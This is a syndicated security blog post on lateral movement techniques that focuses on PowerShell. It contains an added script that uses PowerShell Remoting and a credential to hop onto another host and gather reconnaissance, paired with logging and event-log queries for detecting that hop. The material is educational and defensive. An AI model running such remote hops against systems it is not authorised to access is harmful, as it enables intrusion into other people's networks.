Ethical hacking: Lateral movement techniques

Introduction

Anyone with even an introductory understanding of hacking techniques knows how heavily attackers rely on lateral movement to reach their objectives inside someone else's network. But what exactly are lateral movement techniques?

This article details some of the most popular lateral movement techniques used by adversaries. Ethical hackers should study them so they can better test their own organization's network against these attacks. If you want a solid overview of common lateral movement techniques, this article is for you.

A little about lateral movements

To give a quick definition: lateral movement is the set of techniques attackers use to move systematically from an initial foothold to other systems on a network, searching for sensitive data or assets and ultimately positioning themselves for data exfiltration.

Did you know that, on average, it takes seven months before a data breach is discovered? And that only 4% of these breaches are actually investigated?

Or consider this: for roughly 80% of the time an attack is underway, the attacker is performing lateral movement. This is because attackers usually enter a system blind, with no map of the network, and have to move slowly to minimize the chance of detection. Just imagine the potential data exfiltration, among other damage, that attackers can cause during that time. It is enough to make anyone security-minded lose sleep.

PowerShell

PowerShell is the number one mechanism used to carry out lateral movement. Its object-oriented scripting makes stealing credentials, modifying system configuration and automating movement from system to system about as easy as it gets, and the tool itself is perfectly legal to own: it ships with every modern Windows system. (Funny how some of the most easily accessible tools end up being used for attack techniques, lateral movement included.)

Technically, PowerShell is a tool rather than a technique, but it is definitely worth a mention given how overrepresented it is in lateral movement activity.
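As an added example (not code from the original article or its author), here is what a single PowerShell-driven hop looks like from both sides: the attacker's remoting session into a neighbouring host, and the logging a defender would switch on and query to catch that same hop. The host name FILESRV01, the account CORP\svc-admin and the authorisation to test them are assumptions for illustration only.

```powershell
# Added example, not code from the original article. Assumptions: you are
# authorised to test FILESRV01, hold a credential for CORP\svc-admin that is a
# local administrator there, and WinRM (PowerShell Remoting) is enabled on it.

$Target = 'FILESRV01'                            # assumed target host
$Cred   = Get-Credential -UserName 'CORP\svc-admin' -Message 'Password for the test account'

# --- Attacker side: one lateral hop over PowerShell Remoting (WinRM, TCP 5985/5986)

# Is there a WS-Man listener we can talk to at all?
if (-not (Test-WSMan -ComputerName $Target -ErrorAction SilentlyContinue)) {
    throw "WinRM is not reachable on $Target"
}

# Open a remote session with the obtained credential and run code on the target.
$Session = New-PSSession -ComputerName $Target -Credential $Cred

$Recon = Invoke-Command -Session $Session -ScriptBlock {
    # This block runs on the remote host. Collect what the next hop needs:
    # who we are there, whether we are admin, and which peers the box talks to.
    $Identity  = [Security.Principal.WindowsIdentity]::GetCurrent()
    $Principal = [Security.Principal.WindowsPrincipal]$Identity
    [pscustomobject]@{
        Host    = $env:COMPUTERNAME
        User    = $Identity.Name
        IsAdmin = $Principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
        Peers   = Get-NetTCPConnection -State Established |
                  Select-Object -ExpandProperty RemoteAddress -Unique
    }
}
$Recon | Format-List
Remove-PSSession -Session $Session

# --- Defender side: make the same hop visible and go looking for it

# Turn on script block logging (the registry equivalent of the Group Policy
# setting). From then on every executed block is written as Event ID 4104 to
# Microsoft-Windows-PowerShell/Operational, including the block above.
$LogKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
New-Item -Path $LogKey -Force | Out-Null
Set-ItemProperty -Path $LogKey -Name 'EnableScriptBlockLogging' -Value 1 -Type DWord

# Hunt: script blocks from the last day that open or use remoting sessions.
$Since = (Get-Date).AddDays(-1)
Get-WinEvent -FilterHashtable @{
        LogName   = 'Microsoft-Windows-PowerShell/Operational'
        Id        = 4104
        StartTime = $Since
    } -ErrorAction SilentlyContinue |
    Where-Object { $_.Message -match 'New-PSSession|Invoke-Command|Enter-PSSession' } |
    Select-Object TimeCreated, MachineName, Message

# The remote end of the hop also appears in the Security log as a network
# logon (Event ID 4624, LogonType 3) followed by a new wsmprovhost.exe process.
Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4624; StartTime = $Since } -ErrorAction SilentlyContinue |
    Where-Object { $_.Properties[8].Value -eq 3 } |      # Properties[8] is LogonType
    Select-Object TimeCreated,
                  @{ n = 'Account'; e = { $_.Properties[5].Value } },   # TargetUserName
                  @{ n = 'Source';  e = { $_.Properties[18].Value } }   # IpAddress
```

Run the attacker half from the host you have already compromised in the test and the defender half on FILESRV01 from an elevated prompt; the registry change and the Security log query both need local administrator rights. The point of pairing them is the one the article makes: the hop is ordinary, signed, built-in tooling, so it is the logging around it, not the tool itself, that gives the defender anything to detect.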

*** This is a Security Bloggers Network syndicated blog from Infosec Resources authored by Greg Belding. Read the original post at: http://feedproxy.google.com/~r/infosecResources/~3/sdLg7hT44bw/